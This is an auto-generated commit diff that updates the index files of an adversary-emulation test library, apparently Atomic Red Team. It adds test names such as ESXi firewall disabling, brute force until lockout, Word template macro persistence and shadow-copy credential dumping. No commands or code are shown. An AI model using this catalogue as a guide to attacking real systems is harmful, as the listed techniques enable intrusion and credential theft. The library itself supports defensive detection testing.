Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -13,6 +13,7 @@ defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution o
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
+defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,14,Running DLL with .init extension and function,2d5029f0-ae20-446f-8811-e7511b58e8b6,command_prompt
 defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
 defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
 defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
@@ -238,6 +239,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,19,
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
+defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt
 defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
 defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
@@ -1082,6 +1084,7 @@ persistence,T1136.002,Create Account: Domain Account,2,Create a new account simi
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
 persistence,T1136.002,Create Account: Domain Account,4,Active Directory Create Admin Account,562aa072-524e-459a-ba2b-91f1afccf5ab,sh
 persistence,T1136.002,Create Account: Domain Account,5,Active Directory Create User Account (Non-elevated),8c992cb3-a46e-4fd5-b005-b1bab185af31,sh
+persistence,T1137.001,Office Application Startup: Office Template Macros.,1,Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell,940db09e-80b6-4dd0-8d4d-7764f89b47a8,powershell
 persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
 persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
@@ -1278,6 +1281,7 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compress
 collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
+collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell
 collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
 collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
@@ -1373,6 +1377,7 @@ credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User
 credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
 credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
 credential-access,T1110.001,Brute Force: Password Guessing,7,SUDO Brute Force - FreeBSD,abcde488-e083-4ee7-bc85-a5684edd7541,bash
+credential-access,T1110.001,Brute Force: Password Guessing,8,ESXi - Brute Force Until Account Lockout,ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5,powershell
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
@@ -1533,6 +1538,7 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow C
 credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
 credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
+credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -13,6 +13,7 @@ defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution o
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
+defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,14,Running DLL with .init extension and function,2d5029f0-ae20-446f-8811-e7511b58e8b6,command_prompt
 defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
@@ -144,6 +145,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,6,A
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
+defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt
 defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
@@ -731,6 +733,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbrok
 persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
+persistence,T1137.001,Office Application Startup: Office Template Macros.,1,Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell,940db09e-80b6-4dd0-8d4d-7764f89b47a8,powershell
 persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
 persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
@@ -850,6 +853,7 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,1,Compress Data
 collection,T1560.001,Archive Collected Data: Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
 collection,T1560.001,Archive Collected Data: Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
 collection,T1560.001,Archive Collected Data: Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
+collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell
 collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
 collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
 collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
@@ -901,6 +905,7 @@ credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8
 credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
 credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
+credential-access,T1110.001,Brute Force: Password Guessing,8,ESXi - Brute Force Until Account Lockout,ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5,powershell
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
@@ -1008,6 +1013,7 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow C
 credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
 credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
+credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -18,6 +18,7 @@
   - Atomic Test #11: Rundll32 with Ordinal Value [windows]
   - Atomic Test #12: Rundll32 with Control_RunDLL [windows]
   - Atomic Test #13: Rundll32 with desk.cpl [windows]
+  - Atomic Test #14: Running DLL with .init extension and function [windows]
 - T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
   - Atomic Test #1: Malicious PAM rule [linux]
@@ -300,6 +301,7 @@
   - Atomic Test #20: LockBit Black - Unusual Windows firewall registry modification -cmd [windows]
   - Atomic Test #21: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows]
   - Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall [windows]
+  - Atomic Test #23: ESXi - Disable Firewall via Esxcli [windows]
 - [T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md)
   - Atomic Test #1: SIP (Subject Interface Package) Hijacking via Custom DLL [windows]
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1473,7 +1475,8 @@
   - Atomic Test #4: Active Directory Create Admin Account [linux]
   - Atomic Test #5: Active Directory Create User Account (Non-elevated) [linux]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1137.001 Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md)
+  - Atomic Test #1: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell [windows]
 - [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
   - Atomic Test #1: Create registry persistence via AppCert DLL [windows]
 - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1776,6 +1779,7 @@
   - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
   - Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos]
   - Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
+  - Atomic Test #10: ESXi - Remove Syslog remote IP [windows]
 - [T1113 Screen Capture](../../T1113/T1113.md)
   - Atomic Test #1: Screencapture [macos]
   - Atomic Test #2: Screencapture (silent) [macos]
@@ -1938,6 +1942,7 @@
   - Atomic Test #5: SUDO Brute Force - Debian [linux]
   - Atomic Test #6: SUDO Brute Force - Redhat [linux]
   - Atomic Test #7: SUDO Brute Force - FreeBSD [linux]
+  - Atomic Test #8: ESXi - Brute Force Until Account Lockout [windows]
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
   - Atomic Test #1: Gsecdump [windows]
   - Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -2152,6 +2157,7 @@
   - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
   - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
   - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
+  - Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows]
 - [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
   - Atomic Test #1: Request for service tickets [windows]
   - Atomic Test #2: Rubeus kerberoast [windows]

atomics/Indexes/Indexes-Markdown/office-365-index.md

@@ -93,7 +93,7 @@
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -18,6 +18,7 @@
   - Atomic Test #11: Rundll32 with Ordinal Value [windows]
   - Atomic Test #12: Rundll32 with Control_RunDLL [windows]
   - Atomic Test #13: Rundll32 with desk.cpl [windows]
+  - Atomic Test #14: Running DLL with .init extension and function [windows]
 - T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md)
   - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
@@ -194,6 +195,7 @@
   - Atomic Test #20: LockBit Black - Unusual Windows firewall registry modification -cmd [windows]
   - Atomic Test #21: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows]
   - Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall [windows]
+  - Atomic Test #23: ESXi - Disable Firewall via Esxcli [windows]
 - [T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md)
   - Atomic Test #1: SIP (Subject Interface Package) Hijacking via Custom DLL [windows]
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1021,7 +1023,8 @@
   - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
   - Atomic Test #3: Create a new Domain Account using PowerShell [windows]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1137.001 Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md)
+  - Atomic Test #1: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell [windows]
 - [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
   - Atomic Test #1: Create registry persistence via AppCert DLL [windows]
 - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1230,6 +1233,7 @@
   - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
   - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
   - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
+  - Atomic Test #10: ESXi - Remove Syslog remote IP [windows]
 - [T1113 Screen Capture](../../T1113/T1113.md)
   - Atomic Test #7: Windows Screencapture [windows]
   - Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
@@ -1335,6 +1339,7 @@
   - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
   - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
   - Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
+  - Atomic Test #8: ESXi - Brute Force Until Account Lockout [windows]
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
   - Atomic Test #1: Gsecdump [windows]
   - Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -1487,6 +1492,7 @@
   - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
   - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
   - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
+  - Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows]
 - [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
   - Atomic Test #1: Request for service tickets [windows]
   - Atomic Test #2: Rubeus kerberoast [windows]

atomics/Indexes/Matrices/matrix.md

@@ -54,7 +54,7 @@
 |  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) |  |  |  |  |  |  |
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
-|  |  | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
+|  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |

atomics/Indexes/Matrices/windows-matrix.md

@@ -41,7 +41,7 @@
 |  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Process Injection](../../T1055/T1055.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [Forced Authentication](../../T1187/T1187.md) |  |  |  |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Reflective Code Loading](../../T1620/T1620.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |

atomics/Indexes/azure-ad-index.yaml

